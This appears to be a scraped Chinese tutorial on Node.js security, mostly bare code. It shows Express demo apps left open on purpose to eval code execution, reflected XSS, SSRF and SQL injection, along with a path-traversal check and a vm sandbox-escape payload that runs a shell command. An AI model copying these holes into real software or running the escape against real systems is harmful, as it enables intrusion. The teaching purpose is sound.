var express = require('express'); var helmet = require('helmet') var app = express(); app.use(helmet()) app.get('/', function (req, res){ res.end("hello ghtwf01") })
var server = app.listen(8888,function (){ var host = server.address().address var port = server = server.address().port console.log("应用实例,访问地址为 http://%s:%s", host, port) })
代码执行
示例代码如下
1 2 3 4 5 6 7 8 9 10 11
var express = require('express'); var app = express(); app.get('/eval', function (req, res){ res.send(eval(req.query.code)); })
var server = app.listen(8888,function (){ var host = server.address().address var port = server = server.address().port console.log("应用实例,访问地址为 http://%s:%s", host, port) })
var express = require('express'); var app = express();
app.get('/xss', function (req, res){ res.end(req.query.content); })
var server = app.listen(8888,function (){ var host = server.address().address var port = server = server.address().port console.log("应用实例,访问地址为 http://%s:%s", host, port) })
var express = require('express'); var app = express(); var needle = require('needle'); app.get('/ssrf', function (req, res){ var url = req.query['url']; needle.get(url); res.end('new request:'+url); })
var server = app.listen(8888,function (){ var host = server.address().address var port = server = server.address().port console.log("应用实例,访问地址为 http://%s:%s", host, port) })
var express = require('express'); var app = express(); var mysql = require('mysql'); var connection = mysql.createConnection({ host : 'localhost', user : 'root', password : 'root', database : 'users', port : '8889' }); connection.connect();
app.get('/sqli', function (req, res){ var id = req.query.id; var sql = "select * from user where id="+id; connection.query(sql,function(error, result){ if (error) { res.send(error); } res.send(result[0]); });
connection.end();
}) var server = app.listen(8888,function (){ var host = server.address().address var port = server = server.address().port console.log("应用实例,访问地址为 http://%s:%s", host, port) })
// decode the path var path = decode(this.path) if (path === -1) { this.error(400) return res }
// null byte(s) if (~path.indexOf('\0')) { this.error(400) return res }
var parts if (root !== null) { // malicious path if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) { debug('malicious path "%s"', path) this.error(403) return res }
// join / normalize from optional root dir path = normalize(join(root, path)) root = normalize(root + sep)
关键位置是
1 2 3 4 5 6 7 8 9 10 11
if (root !== null) { // malicious path if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) { debug('malicious path "%s"', path) this.error(403) return res }
// join / normalize from optional root dir path = normalize(join(root, path)) root = normalize(root + sep)
const code = 'x += 40; var y = 17;'; // `x` and `y` are global variables in the context. // Initially, x has the value 2 because that is the value of context.x. vm.runInContext(code, context);
const script = new vm.Script(`this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()`); vm.createContext(context); var result = script.runInContext(context); console.log(result);